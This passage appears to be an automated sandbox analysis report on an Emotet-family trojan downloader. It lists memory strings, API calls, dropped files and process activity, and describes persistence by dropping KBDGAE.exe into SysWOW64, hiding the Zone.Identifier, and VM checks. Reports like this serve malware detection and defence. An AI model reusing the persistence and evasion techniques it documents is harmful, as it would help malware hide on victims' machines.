          Source: svchost.exe, 00000018.00000003.479078515.000001C21DF5C000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.479027196.000001C21DFBE000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.479101603.000001C21DF46000.00000004.00000001.sdmp | String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
          Source: svchost.exe, 00000018.00000003.479078515.000001C21DF5C000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.479027196.000001C21DFBE000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.479101603.000001C21DF46000.00000004.00000001.sdmp | String found in binary or memory: http://www.g5e.com/termsofservice
          Source: svchost.exe, 00000018.00000003.477651130.000001C21DF7B000.00000004.00000001.sdmp | String found in binary or memory: http://www.hulu.com/privacy
          Source: svchost.exe, 00000018.00000003.477651130.000001C21DF7B000.00000004.00000001.sdmp | String found in binary or memory: http://www.hulu.com/terms
          Source: svchost.exe, 00000005.00000003.306133734.000001ED2A861000.00000004.00000001.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
          Source: svchost.exe, 00000005.00000003.306154545.000001ED2A85A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000005.00000003.306154545.000001ED2A85A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
          Source: svchost.exe, 00000005.00000003.306133734.000001ED2A861000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
          Source: svchost.exe, 00000005.00000002.306699521.000001ED2A83D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
          Source: svchost.exe, 00000005.00000003.306154545.000001ED2A85A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
          Source: svchost.exe, 00000005.00000003.306133734.000001ED2A861000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
          Source: svchost.exe, 00000005.00000002.306730175.000001ED2A84E000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
          Source: svchost.exe, 00000005.00000003.306154545.000001ED2A85A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
          Source: svchost.exe, 00000005.00000003.306133734.000001ED2A861000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
          Source: svchost.exe, 00000005.00000002.306699521.000001ED2A83D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
          Source: svchost.exe, 00000005.00000003.306133734.000001ED2A861000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
          Source: svchost.exe, 00000005.00000003.306133734.000001ED2A861000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
          Source: svchost.exe, 00000005.00000003.306133734.000001ED2A861000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
          Source: svchost.exe, 00000005.00000002.306713796.000001ED2A842000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
          Source: svchost.exe, 00000005.00000002.306713796.000001ED2A842000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
          Source: svchost.exe, 00000005.00000003.306133734.000001ED2A861000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
          Source: svchost.exe, 00000005.00000003.306154545.000001ED2A85A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
          Source: svchost.exe, 00000005.00000003.306154545.000001ED2A85A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
          Source: svchost.exe, 00000005.00000003.306154545.000001ED2A85A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
          Source: svchost.exe, 00000005.00000003.306154545.000001ED2A85A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
          Source: svchost.exe, 00000005.00000003.306123593.000001ED2A864000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.306713796.000001ED2A842000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.306154545.000001ED2A85A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t
          Source: svchost.exe, 00000005.00000003.306133734.000001ED2A861000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
          Source: svchost.exe, 00000005.00000002.306699521.000001ED2A83D000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000005.00000003.284300397.000001ED2A831000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
          Source: svchost.exe, 00000018.00000003.479078515.000001C21DF5C000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.479027196.000001C21DFBE000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.479101603.000001C21DF46000.00000004.00000001.sdmp | String found in binary or memory: https://instagram.com/hiddencity_
          Source: svchost.exe, 00000018.00000003.472860631.000001C21DF46000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.472920325.000001C21DF69000.00000004.00000001.sdmp | String found in binary or memory: https://picsart.com/privacy-policy?hl=en
          Source: svchost.exe, 00000005.00000002.306699521.000001ED2A83D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
          Source: svchost.exe, 00000005.00000002.306628960.000001ED2A813000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
          Source: svchost.exe, 00000005.00000003.284300397.000001ED2A831000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
          Source: svchost.exe, 00000005.00000003.306203525.000001ED2A845000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
          Source: svchost.exe, 00000005.00000003.306182596.000001ED2A840000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
          Source: svchost.exe, 00000005.00000003.306236297.000001ED2A83A000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
          Source: svchost.exe, 00000005.00000002.306730175.000001ED2A84E000.00000004.00000001.sdmp | String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
          Source: svchost.exe, 00000002.00000002.519669425.000001AA3DC15000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.495678160.000001C21DF1F000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
          Source: svchost.exe, 00000018.00000003.477651130.000001C21DF7B000.00000004.00000001.sdmp | String found in binary or memory: https://www.hulu.com/ca-privacy-rights
          Source: svchost.exe, 00000018.00000003.477651130.000001C21DF7B000.00000004.00000001.sdmp | String found in binary or memory: https://www.hulu.com/do-not-sell-my-info
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe, 00000000.00000002.247958422.00000000007BA000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected Emotet
          Source: Yara match | File source: 00000000.00000002.248081066.0000000000C41000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.516683693.0000000000AA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.247934419.0000000000610000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.516869836.0000000000AB1000.00000020.00000001.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | File created: C:\Windows\SysWOW64\tpmcompc\
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | File deleted: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe:Zone.Identifier
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Code function: 0_2_00612565
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Code function: 0_2_006123F9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Code function: 0_2_00C42C26
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Code function: 0_2_00C42ABA
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Code function: 1_2_00AA2565
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Code function: 1_2_00AA23F9
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Code function: 1_2_00AB2C26
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Code function: 1_2_00AB2ABA
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe, 00000000.00000002.248793368.0000000002E00000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe, 00000000.00000002.248793368.0000000002E00000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe, 00000000.00000002.247928795.00000000005F0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameMFC42.DLL.MUIR vs SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe, 00000000.00000002.248665903.0000000002D00000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe, 00000000.00000002.247799112.000000000040E000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameTabDrives.EXEL vs SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Binary or memory string: OriginalFilenameTabDrives.EXEL vs SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe
          Source: classification engine | Classification label: mal68.troj.evad.winEXE@16/5@0/2
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Code function: 1_2_00AB35D2 Process32NextW,CreateToolhelp32Snapshot,FindCloseChangeNotification, 1_2_00AB35D2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Code function: 0_2_004039E0 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,LoadLibraryExA,LoadLibraryExA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,SizeofResource,LoadLibraryExA,atoi,atoi,atoi,GetCurrentProcess,VirtualAllocExNuma,#825,#825, 0_2_004039E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6336:120:WilError_01
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe'
          Source: unknown | Process created: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe
          Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
          Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
          Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
          Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
          Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: unknown | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Process created: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe
          Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Code function: 0_2_00408070 push eax; ret 0_2_0040809E
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Code function: 1_2_00408070 push eax; ret 1_2_0040809E

          Persistence and Installation Behavior:

          Drops executables to the windows directory (C:\Windows) and starts them
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Executable created and started: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | PE file moved: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe

          Hooking and other Techniques for Hiding and Protection:

          Hides that the sample has been downloaded from the Internet (zone.identifier)
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | File opened: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe:Zone.Identifier read attributes | delete
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\System32\svchost.exe TID: 5584 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6060 | Thread sleep time: -240000s >= -30000s
          Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | File Volume queried: C:\ FullSizeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Code function: 0_2_00405DE0 FindFirstFileA,CloseHandle, 0_2_00405DE0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Code function: 0_2_004051E0 #535,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,#800,#800,SendMessageA,#537,_mbscmp,_mbscmp,#4000,#535,#5710,_mbscmp,#800,#941,#941,#800,#800,FindNextFileA,FindClose,#800,#800, 0_2_004051E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Code function: 0_2_00406240 _mbscmp,#535,_mbscmp,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,FindNextFileA,#537,_mbscmp,_mbscmp,#800,FindNextFileA,FindClose,#800, 0_2_00406240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Code function: 0_2_00405F40 #535,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,#800,#1168,#1669,SendMessageA,#537,_mbscmp,_mbscmp,#4000,#535,#5710,_mbscmp,#800,#941,#941,#800,#800,FindNextFileA,FindClose,#1168,#2652,#800, 0_2_00405F40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Code function: 0_2_00C428BC FindNextFileW,FindFirstFileW,FindClose, 0_2_00C428BC
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Code function: 1_2_00405DE0 FindFirstFileA,CloseHandle, 1_2_00405DE0
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Code function: 1_2_004051E0 #535,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,#800,#800,SendMessageA,#537,_mbscmp,_mbscmp,#4000,#535,#5710,_mbscmp,#800,#941,#941,#800,#800,FindNextFileA,FindClose,#800,#800, 1_2_004051E0
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Code function: 1_2_00406240 _mbscmp,#535,_mbscmp,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,FindNextFileA,#537,_mbscmp,_mbscmp,#800,FindNextFileA,FindClose,#800, 1_2_00406240
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Code function: 1_2_00405F40 #535,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,#800,#1168,#1669,SendMessageA,#537,_mbscmp,_mbscmp,#4000,#535,#5710,_mbscmp,#800,#941,#941,#800,#800,FindNextFileA,FindClose,#1168,#2652,#800, 1_2_00405F40
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Code function: 1_2_00AB28BC FindNextFileW,FindFirstFileW,FindClose, 1_2_00AB28BC
          Source: svchost.exe, 00000008.00000002.302356540.0000011C44F40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.363799652.000001E337260000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.443570729.00000268FD140000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.460658141.0000013D1D340000.00000002.00000001.sdmp, svchost.exe, 00000018.00000002.496150156.000001C21E600000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: svchost.exe, 00000002.00000002.519752062.000001AA3DC62000.00000004.00000001.sdmp | Binary or memory string: @Hyper-V RAW
          Source: KBDGAE.exe, 00000001.00000002.519880120.00000000028C8000.00000004.00000001.sdmp, svchost.exe, 00000002.00000002.519740101.000001AA3DC56000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.495528806.000001C21D6E7000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
          Source: svchost.exe, 00000008.00000002.302356540.0000011C44F40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.363799652.000001E337260000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.443570729.00000268FD140000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.460658141.0000013D1D340000.00000002.00000001.sdmp, svchost.exe, 00000018.00000002.496150156.000001C21E600000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: svchost.exe, 00000008.00000002.302356540.0000011C44F40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.363799652.000001E337260000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.443570729.00000268FD140000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.460658141.0000013D1D340000.00000002.00000001.sdmp, svchost.exe, 00000018.00000002.496150156.000001C21E600000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: svchost.exe, 00000004.00000002.515292885.000001E2AE42A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: svchost.exe, 00000008.00000002.302356540.0000011C44F40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.363799652.000001E337260000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.443570729.00000268FD140000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.460658141.0000013D1D340000.00000002.00000001.sdmp, svchost.exe, 00000018.00000002.496150156.000001C21E600000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Code function: 0_2_00610467 mov eax, dword ptr fs:[00000030h] 0_2_00610467
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Code function: 0_2_00613022 mov eax, dword ptr fs:[00000030h] 0_2_00613022
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Code function: 0_2_0061273F mov eax, dword ptr fs:[00000030h] 0_2_0061273F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Code function: 0_2_00C436E3 mov eax, dword ptr fs:[00000030h] 0_2_00C436E3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Code function: 0_2_00C42E00 mov eax, dword ptr fs:[00000030h] 0_2_00C42E00
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Code function: 1_2_00AA3022 mov eax, dword ptr fs:[00000030h] 1_2_00AA3022
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Code function: 1_2_00AA0467 mov eax, dword ptr fs:[00000030h] 1_2_00AA0467
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Code function: 1_2_00AA273F mov eax, dword ptr fs:[00000030h] 1_2_00AA273F
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Code function: 1_2_00AB36E3 mov eax, dword ptr fs:[00000030h] 1_2_00AB36E3
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Code function: 1_2_00AB2E00 mov eax, dword ptr fs:[00000030h] 1_2_00AB2E00
          Source: KBDGAE.exe, 00000001.00000002.517298977.0000000000ED0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: KBDGAE.exe, 00000001.00000002.517298977.0000000000ED0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: KBDGAE.exe, 00000001.00000002.517298977.0000000000ED0000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: KBDGAE.exe, 00000001.00000002.517298977.0000000000ED0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings: